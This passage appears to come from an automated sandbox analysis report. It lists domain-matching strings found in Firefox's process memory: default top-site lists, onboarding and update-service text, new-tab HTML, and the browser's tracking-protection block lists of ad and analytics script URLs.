var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-mobilecrosspromo.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-modal&utm_campaign=mr2022&utm_content=new-globalhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)Thank you for using Firefox, backed by the Mozilla Foundation. With your support, we're working to make the internet safer and more accessible for everyone. url('chrome://activity-stream/content/data/content/assets/mr-gratitude.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/device-migration.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-mobilecrosspromo.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-modal&utm_campaign=mr2022&utm_content=new-globalhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)Thank you for using Firefox, backed by the Mozilla Foundation. With your support, we're working to make the internet safer and more accessible for everyone. url('chrome://activity-stream/content/data/content/assets/mr-gratitude.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/AND (visited OR NOT bookmarked) equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/AND (visited OR NOT bookmarked) equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/AND (visited OR NOT bookmarked) equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: - the given reason to update is not supportedfindUpdates() - updateTask succeeded for onPrefEnabledChanged() - adding gmp directory startup - adding clearkey CDM failedfindUpdates() - found update for KEY_PLUGIN_LAST_DOWNLOAD_FAIL_REASON*://web-assets.toggl.com/app/assets/scripts/*.js*://*.imgur.com/js/vendor.*.bundle.js*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/sdk.js**://www.everestjs.net/static/st.v3.js**://connect.facebook.net/*/all.js*@mozilla.org/addons/addon-manager-startup;1resource://gre/modules/addons/XPIProvider.jsmFileUtils_closeSafeFileOutputStream@mozilla.org/network/file-output-stream;1@mozilla.org/network/atomic-file-output-stream;1FileUtils_closeAtomicFileOutputStreamresource://gre/modules/FileUtils.sys.mjswebcompat-reporter%40mozilla.org:1.5.1*://track.adform.net/serving/scripts/trackpoint/FileUtils_openAtomicFileOutputStreamconsumeTransientUserGestureActivation equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "*://www.facebook.com/platform/impression.php*" equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://id.rambler.ru/rambler-id-helper/auth_events.jslinear-gradient(90deg, #9059FF 0%, #FF4AA2 52.08%, #FFBD4F 100%)https://www.amazon.com/exec/obidos/external-search/**://tpc.googlesyndication.com/safeframe/*/html/container.htmlresource://gre/modules/TelemetryController.sys.mjs*://securepubads.g.doubleclick.net/tag/js/gpt.js**://pagead2.googlesyndication.com/pagead/*.js*fcd=true*://www.gstatic.com/firebasejs/*/firebase-messaging.js**://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*resource://gre/modules/TelemetryController.sys.mjs equals www.rambler.ru (Rambler)
                          Source: firefox.exe, 0000001D.00000003.3332867628.00000214ACD45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3356098124.00000214ACD6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: --panel-banner-item-update-supported-bgcolor*://ads.stickyadstv.com/user-matching**://track.adform.net/Serving/TrackPoint/**://pubads.g.doubleclick.net/gampad/*xml_vmap1**://www.facebook.com/platform/impression.php*QUERY_CONTENT_FLAG_SELECTION_URLSTRIKEOUT equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3407434312.00000214ABE1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @mozilla.org/network/safe-file-output-stream;1*://cdn.branch.io/branch-latest.min.js**://static.chartbeat.com/js/chartbeat_video.js*://c.amazon-adsystem.com/aax2/apstag.jshttps://smartblock.firefox.etp/facebook.svg*://*.imgur.io/js/vendor.*.bundle.jshttps://smartblock.firefox.etp/play.svgpictureinpicture%40mozilla.org:1.0.0*://pub.doubleverify.com/signals/pub.js**://auth.9c9media.ca/auth/main.js*://static.chartbeat.com/js/chartbeat.js*://static.criteo.net/js/ld/publishertag.js*://www.rva311.com/static/js/main.*.chunk.jswebcompat-reporter@mozilla.org.xpiFileUtils_openSafeFileOutputStream*://cdn.adsafeprotected.com/iasPET.1.js*://*.moatads.com/*/moatheader.js**://cdn.optimizely.com/public/*.js*://www.google-analytics.com/gtm/js**://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s.webtrends.com/js/advancedLinkTracking.js*://s.webtrends.com/js/webtrends.min.jsget styleSheetChangeEventsEnabled equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
